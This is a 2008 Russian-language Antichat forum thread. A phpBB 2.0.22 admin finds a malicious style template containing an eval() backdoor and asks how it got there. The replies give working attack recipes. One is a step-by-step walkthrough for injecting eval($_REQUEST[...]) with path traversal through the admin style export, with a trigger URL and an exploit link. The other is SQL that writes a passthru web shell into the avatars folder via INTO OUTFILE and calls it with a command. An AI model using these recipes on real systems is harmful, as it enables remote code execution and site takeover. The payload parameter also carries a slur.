Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Сломать phpbb через стили (https://forum.antichat.xyz/showthread.php?t=62319)

cow 21.02.2008 12:19
Сломать phpbb через стили
 
Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный:

Style: FI
Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.

cow 21.02.2008 12:22
Ещё раз в потверждении моей версии, что код выполняться не будет.

Цитата:
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы?

Isis 21.02.2008 12:24
Попытка...попробуй выставить этот стиль и изменить немного адрес, добавив ?nigga=phpinfo();

cow 21.02.2008 12:36
Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!

blackybr 21.02.2008 14:46
в админке можно выполнить любые скл запросы посредством "восстановление бд"

создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились

внимательнее читай прикрепленный топ про пхпбб

Цитата:
2) Через стили. (Нужны админские права).
Суть баги читайте в инете, было выложено.
как юзать:
Идем в админскую панель, жмакаем ссылку в Стилях "Создать". Правим правый фрейм.(Я предпочитаю править прям в опере, жмем исходный код, правим страницу, и жмем обновить из кеша.) style_name делаем произвольным. А template_name удаляем дефолтный(subSilver) и вставляем свой
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

Мы создали стиль, теперь надо его экспортировать в форум. Жмем ссылку "Экспорт", там будет тока текущий стиль, правим сурс, меняем его на
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

В папке /tmp/ появиться файл theme_info.cfg.
Заходя по ссылке
http://localhost/phpbb13/admin/admin_styles.php?mode=addnew&sid=(тут_ваша_ сессия)&&install_to=../../../../../../../tmp/&kiborg=phpinfo();
нам покажеться phpinfo();

Exploit: http://milw0rm.com/exploits/1247

cow 21.02.2008 17:36
Спасибо. Вот что выдал форум

Цитата:
Warning: main(./../templates/tmp/theme_info.cfg): failed to open stream: No such file or directory in ---- on line 78

Warning: main(): Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in ---- on line 78
Я так понимаю на 2.0.22 бага не актуальна?

~!DoK_tOR!~ 24.04.2008 19:32
1. Идём в админку и делаем полную копию базы данных .
2. Теперь нам нужно узнать установочную директорию форума
смотри тут https://forum.antichat.ru/threadnav24488-1-10.html
а теперь правим базу находим такую строку:

PHP код:
INSERT INTO phpbb_categories (cat_idcat_titlecat_orderVALUES('1''test''10'); 
PHP код:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; 
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
восстанавливаем базу

http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл


Время: 20:07